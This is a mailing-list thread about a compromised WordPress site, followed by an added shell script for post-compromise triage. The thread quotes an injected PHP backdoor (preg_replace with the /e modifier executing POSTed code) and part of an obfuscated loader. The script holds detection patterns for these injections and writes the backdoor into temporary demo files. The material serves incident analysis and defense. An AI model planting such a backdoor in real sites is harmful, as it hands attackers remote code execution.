
Re: my wife's website was hacked



Following my previous message, I confirmed this attack was spam related.
Once the attacker gained access to the filesystem, he added many spam posts to my wife's WordPress site. Naturally, the posts appeared as though my wife wrote them. Then the previously mentioned code built a sitemap that pointed to each of those bogus posts.

So this was all about creating bogus links to get people to click them, which in turn, I suppose, would somehow get the attacker paid for people clicking on the ads? I'm uncertain what the benefit is exactly, but I don't have the mind of someone like this.

It's still a mystery how exactly the attacker gained access to her site. Her passwords have been changed of course.

On Sat, Sep 8, 2018 at 7:45 PM Andrew Bauer <knight-of-ni@outlook.com> wrote:
When I woke up this morning I walked into the kitchen to see my wife sitting on the floor with her laptop, banging away on her keyboard, muttering something about her website being hacked. Uh Oh, and I have not even had my morning coffee yet.

It looks like someone did something to do with google site verification, perhaps to take ownership of the site.

Anyways, this file was placed in the web root last night:
googleXXXXXXXXXXXX.html and its contents were simply:

google-site-verification: googleXXXXXXXXXXXX.html

Since it just happened, I ssh'ed to a command line, grep'ed for all files with a modification date of Sep 8, then proceeded to compare suspicious lines of code to the source files found on github.

Further investigation revealed this was inserted into the WordPress Responsive theme's page.php file:
<?php @preg_replace("/[pageerror]/e",$_POST['mkf3wapa'],"saft"); ?>

This was inserted into the default WordPress index.php file:
//header('Content-Type:text/html; charset=utf-8');
$O_0O__O0O0='242';
$OO___0OO00='1';
$O_0O_00OO_='1';
$O0_O_O_O00=urldecode("a very very long string of cryptic text"]();?><?php

Seems this has got to do with a known wordpress hack:
https://gist.github.com/anttiviljami/6fc2645a2688f7b1213b4fcbc73686e8

The sitemap was modified, but the file is so large I gave up trying to find that needle in a haystack.

My best guess is somehow someone was able to take ownership of the site through that Google verification thing then modify the content of her website. I still don't know how that can be possible through Google, since her site is hosted by GoDaddy, but I am far from an expert on hosted sites.

In any case, I told my wife to do the usual... verify she is running the latest wordpress, including any plugins. I'm not sure what else to tell her.

I'd be interested to know if anyone has heard of this kind of attack, what it does, and the best way to prevent it from happening again.


Thanks,
Andy

No Trees were killed in the sending of this message.
However, a large number of electrons were terribly inconvenienced.


--
Thanks,
Andy
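An added example, not code from the thread, that automates the triage steps Andy describes from the defender's side: list the files changed recently in the web root, flag the ones carrying the injection patterns quoted above, and compare the live tree against a clean copy of the same files (what he did by hand against the GitHub source). The page.php one-liner is worth understanding: with the `/e` modifier, preg_replace() evaluates the replacement string as PHP, so that line runs whatever is posted in the `mkf3wapa` parameter; `/e` was deprecated in PHP 5.5 and removed in PHP 7, so it only works on PHP 5 hosts. Placing a google-site-verification file is consistent with claiming the site in Google Search Console in order to submit the spam sitemap the follow-up message mentions. The directory layout, file contents and the `setup_demo` helper are constructed for this demo.

```shell
#!/bin/sh
# Added example (not from the thread): post-compromise triage of a WordPress web root.
# Signatures cover what the thread quotes: preg_replace() with the /e modifier
# (replacement string is eval'ed as PHP; removed in PHP 7), request data used as that
# replacement, and the long O/0/_ variable names of the obfuscated loader in index.php.

# Files under $1 modified within the last $2 days (the "grep for Sep 8" step, portably).
recently_modified() {
    find "$1" -type f -mtime "-$2" | sort
}

# Among the recently modified files, print those matching an injection signature.
flag_suspicious() {
    pat_eval="preg_replace\\([\"'][^\"']*/e[\"']"                          # /e modifier = eval
    pat_input="/e[\"'][[:space:]]*,[[:space:]]*\\\$_(POST|GET|REQUEST)\\["  # POSTed code as replacement
    pat_obfusc="\\\$[O0_]{8,}="                                              # $O_0O__O0O0='...' style names
    recently_modified "$1" "$2" | while IFS= read -r f; do
        if grep -Eq -e "$pat_eval" -e "$pat_input" -e "$pat_obfusc" "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# Files that differ between a clean checkout ($1) and the live tree ($2), plus
# files present in only one of them (e.g. a dropped verification file).
changed_against_clean() {
    diff -rq "$1" "$2" | sed -n 's/^Files .* and \(.*\) differ$/\1/p; s/^Only in \(.*\): \(.*\)$/\1\/\2/p'
}

# Constructed demo trees: a clean copy and a live site carrying the two injections
# and the stray verification file described in the thread. Prints the root directory.
setup_demo() {
    root=$(mktemp -d)
    mkdir -p "$root/clean/wp-content/themes/responsive" "$root/site/wp-content/themes/responsive"
    printf '<?php get_header(); the_content(); ?>\n' > "$root/clean/wp-content/themes/responsive/page.php"
    printf '<?php define("WP_USE_THEMES", true); require __DIR__ . "/wp-blog-header.php";\n' > "$root/clean/index.php"
    cp "$root/clean/wp-content/themes/responsive/page.php" "$root/site/wp-content/themes/responsive/page.php"
    cp "$root/clean/index.php" "$root/site/index.php"
    # the backdoor quoted in the thread, appended to the theme's page.php
    cat >> "$root/site/wp-content/themes/responsive/page.php" <<'EOF'
<?php @preg_replace("/[pageerror]/e",$_POST['mkf3wapa'],"saft"); ?>
EOF
    # the obfuscated loader's variable assignments, added to index.php
    cat >> "$root/site/index.php" <<'EOF'
$O_0O__O0O0='242';
$OO___0OO00='1';
EOF
    # a file that exists only in the live tree (placeholder name, as in the thread)
    printf 'google-site-verification: googleXXXXXXXXXXXX.html\n' > "$root/site/googleXXXXXXXXXXXX.html"
    printf '%s\n' "$root"
}

# Demo run on the constructed trees with a 24-hour window.
demo=$(setup_demo)
echo "== recently modified files matching an injection signature =="
flag_suspicious "$demo/site" 1
echo "== files differing from the clean checkout =="
changed_against_clean "$demo/clean" "$demo/site"
rm -rf "$demo"
```

On a real host, point `flag_suspicious` at the web root with the window you care about and `changed_against_clean` at a fresh download of the same WordPress, theme and plugin versions; anything the signature scan misses but the diff shows is the next thing to read. The signatures are deliberately narrow so they do not fire on WordPress core's own uses of `$_POST`.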